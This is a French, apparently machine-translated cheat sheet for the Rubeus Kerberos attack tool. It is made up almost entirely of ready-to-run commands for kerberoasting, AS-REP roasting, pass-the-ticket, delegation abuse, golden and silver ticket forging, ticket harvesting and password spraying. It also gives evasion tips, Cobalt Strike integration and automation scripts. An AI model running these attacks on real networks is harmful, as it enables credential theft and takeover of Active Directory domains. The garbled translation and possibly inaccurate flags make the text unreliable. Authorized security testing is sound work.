Rubeus Kerberos Outil d'interaction Feuille de chaleur
Aperçu général
Rubeus est un ensemble d'outils C# pour l'interaction et les abus de Kerberos bruts. Il est conçu pour attaquer les implémentations de Kerberos et comprend des fonctionnalités pour les demandes de billets, les renouvellements et diverses attaques basées sur Kerberos. Rubeus est particulièrement utile pour les tests de pénétration Active Directory et les opérations de l'équipe rouge.
C'est pas vrai. Attention : Cet outil est destiné uniquement aux tests de pénétration et aux évaluations de sécurité autorisés. Assurez-vous d'avoir une autorisation appropriée avant d'utiliser dans tout environnement.
Installation
Binaire précompilé
# Download from GitHub releases
Invoke-WebRequest -Uri "https://github.com/GhostPack/Rubeus/releases/download/v2.2.3/Rubeus.exe" -OutFile "Rubeus.exe"
# Verify download
Get-FileHash Rubeus.exe -Algorithm SHA256
Calculer à partir de la source
# Clone repository
git clone https://github.com/GhostPack/Rubeus.git
cd Rubeus
# Compile with Visual Studio or MSBuild
msbuild Rubeus.sln /p:Configuration=Release /p:Platform="Any CPU"
# Output will be in Rubeus/bin/Release/
```_
### Téléchargement alternatif Méthodes
```powershell
# Using PowerShell
$url = "https://github.com/GhostPack/Rubeus/releases/latest/download/Rubeus.exe"
$output = "C:\Tools\Rubeus.exe"
Invoke-WebRequest -Uri $url -OutFile $output
# Using curl (if available)
curl -L -o Rubeus.exe https://github.com/GhostPack/Rubeus/releases/latest/download/Rubeus.exe
```_
## Utilisation de base
### Structure de commandement
```cmd
# Basic syntax
Rubeus.exe [command] [options]
# Get help
Rubeus.exe help
# Get help for specific command
Rubeus.exe [command] /help
Commandes disponibles
| Command | Description |
|---|---|
asktgt |
Request a TGT (Ticket Granting Ticket) |
asktgs |
Request a TGS (Ticket Granting Service) |
askticket |
Request a ticket for a specific service |
renew |
Renew a ticket |
s4u |
Perform S4U (Service for User) attacks |
ptt |
Pass-the-ticket attacks |
purge |
Purge tickets from memory |
describe |
Describe ticket contents |
klist |
List current tickets |
dump |
Dump tickets from memory |
triage |
Triage tickets |
monitor |
Monitor for new tickets |
harvest |
Harvest tickets |
brute |
Brute force passwords |
kerberoast |
Kerberoasting attacks |
asreproast |
AS-REP roasting attacks |
Demandes de billets et gestion
Demande TGT (Billet d'octroi de billets)
# Request TGT with password
Rubeus.exe asktgt /user:username /password:password /domain:domain.com
# Request TGT with NTLM hash
Rubeus.exe asktgt /user:username /rc4:ntlmhash /domain:domain.com
# Request TGT with AES key
Rubeus.exe asktgt /user:username /aes256:aeskey /domain:domain.com
# Request TGT for specific domain controller
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /dc:dc01.domain.com
Demande TGS (Service d'octroi de billets)
# Request TGS for specific service
Rubeus.exe asktgs /ticket:base64ticket /service:cifs/server.domain.com
# Request TGS with current user context
Rubeus.exe asktgs /service:cifs/server.domain.com
# Request TGS for multiple services
Rubeus.exe asktgs /service:cifs/server.domain.com,http/server.domain.com
# Request TGS with specific encryption
Rubeus.exe asktgs /service:cifs/server.domain.com /enctype:aes256
Gestion des billets
# List current tickets
Rubeus.exe klist
# Describe ticket contents
Rubeus.exe describe /ticket:base64ticket
# Purge all tickets
Rubeus.exe purge
# Purge specific ticket
Rubeus.exe purge /luid:0x12345
# Dump tickets from memory
Rubeus.exe dump
# Dump tickets for specific user
Rubeus.exe dump /user:username
Attaques de Kerberoasting
Kerberoasting de base
# Kerberoast all SPNs
Rubeus.exe kerberoast
# Kerberoast specific user
Rubeus.exe kerberoast /user:serviceaccount
# Kerberoast with specific encryption
Rubeus.exe kerberoast /enctype:rc4
# Kerberoast and save to file
Rubeus.exe kerberoast /outfile:kerberoast_hashes.txt
Avancé Kerberoasting
# Kerberoast with LDAP filter
Rubeus.exe kerberoast /ldapfilter:"(&(objectClass=user)(servicePrincipalName=*))"
# Kerberoast specific domain
Rubeus.exe kerberoast /domain:target.domain.com
# Kerberoast with specific domain controller
Rubeus.exe kerberoast /dc:dc01.domain.com
# Kerberoast with enterprise principals
Rubeus.exe kerberoast /enterprise
Kerberoasting ciblé
# Kerberoast specific SPNs
Rubeus.exe kerberoast /spn:MSSQLSvc/sql01.domain.com:1433
# Kerberoast multiple SPNs
Rubeus.exe kerberoast /spn:MSSQLSvc/sql01.domain.com:1433,HTTP/web01.domain.com
# Kerberoast with password policy bypass
Rubeus.exe kerberoast /pwdsetafter:01/01/2020
# Kerberoast high-value targets
Rubeus.exe kerberoast /ldapfilter:"(&(objectClass=user)(servicePrincipalName=*)(adminCount=1))"
Attaques de Roasting AS-REP
Roating AS-REP de base
# AS-REP roast all users
Rubeus.exe asreproast
# AS-REP roast specific user
Rubeus.exe asreproast /user:username
# AS-REP roast and save to file
Rubeus.exe asreproast /outfile:asrep_hashes.txt
# AS-REP roast with specific format
Rubeus.exe asreproast /format:hashcat
Roating AS-REP avancé
# AS-REP roast with LDAP filter
Rubeus.exe asreproast /ldapfilter:"(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"
# AS-REP roast specific domain
Rubeus.exe asreproast /domain:target.domain.com
# AS-REP roast with domain controller
Rubeus.exe asreproast /dc:dc01.domain.com
# AS-REP roast with credentials
Rubeus.exe asreproast /user:username /password:password /domain:domain.com
Pass-the-Ticket (PTT) Attaques
Carte de passage de base
# Pass-the-ticket with base64 ticket
Rubeus.exe ptt /ticket:base64ticket
# Pass-the-ticket from file
Rubeus.exe ptt /ticket:ticket.kirbi
# Pass-the-ticket to specific LUID
Rubeus.exe ptt /ticket:base64ticket /luid:0x12345
# Pass-the-ticket and create process
Rubeus.exe ptt /ticket:base64ticket /createnetonly:C:\Windows\System32\cmd.exe
PTT avancé Techniques
# Pass multiple tickets
Rubeus.exe ptt /ticket:ticket1.kirbi,ticket2.kirbi
# Pass-the-ticket with service validation
Rubeus.exe ptt /ticket:base64ticket /service:cifs/server.domain.com
# Pass-the-ticket and inject into process
Rubeus.exe ptt /ticket:base64ticket /process:explorer.exe
S4U (Service pour l'utilisateur) Attaques
S4U2Self Attaques
# S4U2Self attack
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:targetuser /msdsspn:cifs/server.domain.com
# S4U2Self with AES key
Rubeus.exe s4u /user:serviceaccount /aes256:aeskey /impersonateuser:targetuser /msdsspn:cifs/server.domain.com
# S4U2Self with ticket
Rubeus.exe s4u /ticket:base64ticket /impersonateuser:targetuser /msdsspn:cifs/server.domain.com
Attaques S4U2Proxy
# S4U2Proxy attack
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:targetuser /msdsspn:cifs/server.domain.com /altservice:http
# S4U2Proxy with multiple services
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:targetuser /msdsspn:cifs/server.domain.com /altservice:http,ldap
# S4U2Proxy with existing ticket
Rubeus.exe s4u /ticket:base64ticket /impersonateuser:targetuser /msdsspn:cifs/server.domain.com /altservice:http
Abus de délégation entraînés
# Abuse constrained delegation
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:administrator /msdsspn:cifs/dc01.domain.com
# Abuse with protocol transition
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:administrator /msdsspn:cifs/dc01.domain.com /altservice:ldap /ptt
# Abuse with multiple hops
Rubeus.exe s4u /user:serviceaccount1 /rc4:hash1 /impersonateuser:administrator /msdsspn:cifs/server1.domain.com /altservice:cifs/server2.domain.com
Attaques de billets en or et en argent
Création de billets d'or
# Create golden ticket
Rubeus.exe golden /rc4:krbtgthash /user:administrator /domain:domain.com /sid:S-1-5-21-... /sids:S-1-5-21-...-519
# Create golden ticket with AES
Rubeus.exe golden /aes256:krbtgtaeskey /user:administrator /domain:domain.com /sid:S-1-5-21-...
# Create golden ticket with specific groups
Rubeus.exe golden /rc4:krbtgthash /user:administrator /domain:domain.com /sid:S-1-5-21-... /groups:512,513,518,519,520
Création de billets en argent
# Create silver ticket
Rubeus.exe silver /rc4:servicehash /user:administrator /service:cifs/server.domain.com /domain:domain.com
# Create silver ticket with AES
Rubeus.exe silver /aes256:serviceaeskey /user:administrator /service:cifs/server.domain.com /domain:domain.com
# Create silver ticket for specific service
Rubeus.exe silver /rc4:servicehash /user:administrator /service:MSSQLSvc/sql01.domain.com:1433 /domain:domain.com
Collecte et surveillance des billets
Collecte de billets
# Harvest tickets from all sessions
Rubeus.exe harvest
# Harvest tickets with monitoring
Rubeus.exe harvest /interval:30
# Harvest tickets for specific user
Rubeus.exe harvest /user:administrator
# Harvest and save to file
Rubeus.exe harvest /outfile:harvested_tickets.txt
Surveillance des billets
# Monitor for new tickets
Rubeus.exe monitor
# Monitor with specific interval
Rubeus.exe monitor /interval:60
# Monitor for specific users
Rubeus.exe monitor /filteruser:administrator,serviceaccount
# Monitor and save to file
Rubeus.exe monitor /outfile:monitored_tickets.txt
Triage des billets
# Triage all tickets
Rubeus.exe triage
# Triage tickets for specific user
Rubeus.exe triage /user:administrator
# Triage with LUID filter
Rubeus.exe triage /luid:0x12345
# Triage and show service tickets only
Rubeus.exe triage /service
Attaques de mot de passe
Pulvérisation du mot de passe
# Password spray with single password
Rubeus.exe brute /password:Password123 /noticket
# Password spray with password list
Rubeus.exe brute /passwords:passwords.txt /noticket
# Password spray specific users
Rubeus.exe brute /users:users.txt /password:Password123 /noticket
# Password spray with domain
Rubeus.exe brute /password:Password123 /domain:domain.com /noticket
Validation des titres de créance
# Validate credentials
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /getcredentials
# Validate with NTLM hash
Rubeus.exe asktgt /user:username /rc4:ntlmhash /domain:domain.com /getcredentials
# Validate with AES key
Rubeus.exe asktgt /user:username /aes256:aeskey /domain:domain.com /getcredentials
Techniques avancées
Domaine croisé Attaques
# Request inter-realm TGT
Rubeus.exe asktgt /user:username /password:password /domain:child.domain.com /dc:dc01.child.domain.com
# Request cross-domain TGS
Rubeus.exe asktgs /service:krbtgt/parent.domain.com /domain:child.domain.com /ticket:base64ticket
# Golden ticket for child domain
Rubeus.exe golden /rc4:childhash /user:administrator /domain:child.domain.com /sid:S-1-5-21-... /sids:S-1-5-21-...-519
Abus de délégation sans contrainte
# Monitor for delegation tickets
Rubeus.exe monitor /targetuser:DC01$ /interval:5
# Extract TGT from delegation
Rubeus.exe dump /service:krbtgt /nowrap
# Use extracted TGT
Rubeus.exe ptt /ticket:extractedtgt
Délégation contrainte fondée sur les ressources
# Abuse RBCD
Rubeus.exe s4u /user:controlledaccount /rc4:hash /impersonateuser:administrator /msdsspn:host/target.domain.com /altservice:cifs,http,ldap /ptt
# RBCD with computer account
Rubeus.exe s4u /user:COMPUTER$ /rc4:computerhash /impersonateuser:administrator /msdsspn:host/target.domain.com /ptt
Techniques d'évacuation
OPSEC Considérations
# Use specific encryption types
Rubeus.exe kerberoast /enctype:aes256
# Avoid detection with delays
Rubeus.exe kerberoast /delay:5000
# Use specific domain controllers
Rubeus.exe kerberoast /dc:dc02.domain.com
# Limit requests
Rubeus.exe kerberoast /spn:specific/service.domain.com
Opérations de vol
# Request tickets without caching
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /ptt /luid:0x0
# Use alternative service names
Rubeus.exe s4u /user:serviceaccount /rc4:hash /impersonateuser:user /msdsspn:cifs/server.domain.com /altservice:host
# Minimize ticket lifetime
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /endtime:01/01/2024
Intégration avec d'autres outils
Intégration Mimikatz
# Export tickets for Mimikatz
Rubeus.exe dump /outfile:tickets.kirbi
# Use in Mimikatz
mimikatz # kerberos::ptc tickets.kirbi
Intégration de l'empacket
# Convert Rubeus tickets for Impacket
# Use ticket with impacket tools
export KRB5CCNAME=ticket.ccache
python3 psexec.py -k -no-pass domain.com/administrator@target.domain.com
Intégration de la grève du cobalt
# Cobalt Strike beacon commands
beacon> execute-assembly Rubeus.exe kerberoast
beacon> execute-assembly Rubeus.exe asreproast
beacon> execute-assembly Rubeus.exe dump
Scripts d'automatisation
Évaluation globale de Kerberos
# Comprehensive Kerberos assessment script
param(
[string]$Domain = $env:USERDOMAIN,
[string]$OutputPath = "C:\Temp\KerberosAssessment"
)
# Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null
Write-Host "[+] Starting comprehensive Kerberos assessment for $Domain"
# Kerberoasting
Write-Host "[+] Performing Kerberoasting..."
& Rubeus.exe kerberoast /outfile:"$OutputPath\kerberoast.txt" /domain:$Domain
# AS-REP Roasting
Write-Host "[+] Performing AS-REP Roasting..."
& Rubeus.exe asreproast /outfile:"$OutputPath\asreproast.txt" /domain:$Domain
# Ticket triage
Write-Host "[+] Triaging current tickets..."
& Rubeus.exe triage|Out-File "$OutputPath\ticket_triage.txt"
# Dump tickets
Write-Host "[+] Dumping tickets..."
& Rubeus.exe dump|Out-File "$OutputPath\ticket_dump.txt"
Write-Host "[+] Assessment complete. Results saved to $OutputPath"
Collecte automatisée des billets
# Automated ticket harvesting script
param(
[int]$Interval = 300, # 5 minutes
[string]$OutputPath = "C:\Temp\TicketHarvest",
[int]$Duration = 3600 # 1 hour
)
New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null
$endTime = (Get-Date).AddSeconds($Duration)
$iteration = 1
Write-Host "[+] Starting ticket harvesting for $Duration seconds"
while ((Get-Date) -lt $endTime) \\\\{
$timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
$outputFile = "$OutputPath\harvest_$iteration`_$timestamp.txt"
Write-Host "[+] Iteration $iteration - Harvesting tickets..."
& Rubeus.exe harvest|Out-File $outputFile
Write-Host "[+] Tickets saved to $outputFile"
if ((Get-Date) -lt $endTime) \\{
Write-Host "[+] Waiting $Interval seconds..."
Start-Sleep -Seconds $Interval
\\}
$iteration++
\\}
Write-Host "[+] Ticket harvesting complete"
Script de reconnaissance du domaine
# Domain reconnaissance with Rubeus
param(
[string]$Domain,
[string]$Username,
[string]$Password,
[string]$OutputPath = "C:\Temp\DomainRecon"
)
New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null
Write-Host "[+] Starting domain reconnaissance for $Domain"
# Test credentials
Write-Host "[+] Testing credentials..."
$credTest = & Rubeus.exe asktgt /user:$Username /password:$Password /domain:$Domain /getcredentials
$credTest|Out-File "$OutputPath\credential_test.txt"
if ($credTest -match "TGT request successful") \\{
Write-Host "[+] Credentials valid, continuing reconnaissance..."
# Kerberoasting with credentials
Write-Host "[+] Kerberoasting with credentials..."
& Rubeus.exe kerberoast /creduser:$Username /credpassword:$Password /domain:$Domain /outfile:"$OutputPath\kerberoast_creds.txt"
# AS-REP Roasting with credentials
Write-Host "[+] AS-REP Roasting with credentials..."
& Rubeus.exe asreproast /creduser:$Username /credpassword:$Password /domain:$Domain /outfile:"$OutputPath\asreproast_creds.txt"
Write-Host "[+] Reconnaissance complete"
\\} else \\{
Write-Host "[-] Credentials invalid, stopping reconnaissance"
\\}
Dépannage
Questions communes
# Clock skew issues
w32tm /resync
# Network connectivity
nslookup domain.com
telnet dc01.domain.com 88
# Kerberos configuration
klist purge
klist
# DNS resolution
nslookup _kerberos._tcp.domain.com
Mode de débogage
# Enable Kerberos logging
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters" /v LogLevel /t REG_DWORD /d 1
# View Kerberos events
Get-WinEvent -LogName System|Where-Object \\{$_.Id -eq 4768 -or $_.Id -eq 4769\\}
# Check ticket cache
klist tickets
Résolution d'erreur
# KDC_ERR_PREAUTH_FAILED
# Check username/password, account lockout
# KDC_ERR_C_PRINCIPAL_UNKNOWN
# Verify username format and domain
# KDC_ERR_S_PRINCIPAL_UNKNOWN
# Check SPN existence and format
# KRB_AP_ERR_SKEW
# Synchronize time with domain controller
Meilleures pratiques
Sécurité opérationnelle
- Utiliser des comptes légitimes: Éviter les comptes de services suspects lorsque c'est possible
- Demandes limitées: Ne pas inonder le contrôleur de domaine avec des requêtes
- ** Synchronisation des temps** : S'assurer de la synchronisation du temps nécessaire pour éviter le skew de l'horloge
- Clean up: Supprimer les tickets injectés après les opérations
- Logs de surveillance: Soyez conscient des événements de sécurité générés
Stratégie d'attaque
# Start with reconnaissance
Rubeus.exe triage
Rubeus.exe klist
# Identify targets
Rubeus.exe kerberoast /stats
Rubeus.exe asreproast /stats
# Execute targeted attacks
Rubeus.exe kerberoast /user:specific_target
Rubeus.exe s4u /user:service /rc4:hash /impersonateuser:admin
# Maintain persistence
Rubeus.exe golden /rc4:krbtgt_hash /user:admin /domain:domain.com
Ressources
- [Rubeus GitHub Repository] (LINK_5)
- [Documentation du Protocole de Kerberos] (LINK_5)
- [Sécurité active du répertoire] (LINK_5)
- [Blogue de Harmj0y] (LINK_5)
- [SpecterOps Blog] (LINK_5)
*Cette feuille de triche fournit une référence complète pour l'utilisation de Rubeus. Assurez-vous toujours d'avoir une autorisation appropriée avant d'effectuer des évaluations de sécurité Active Directory. *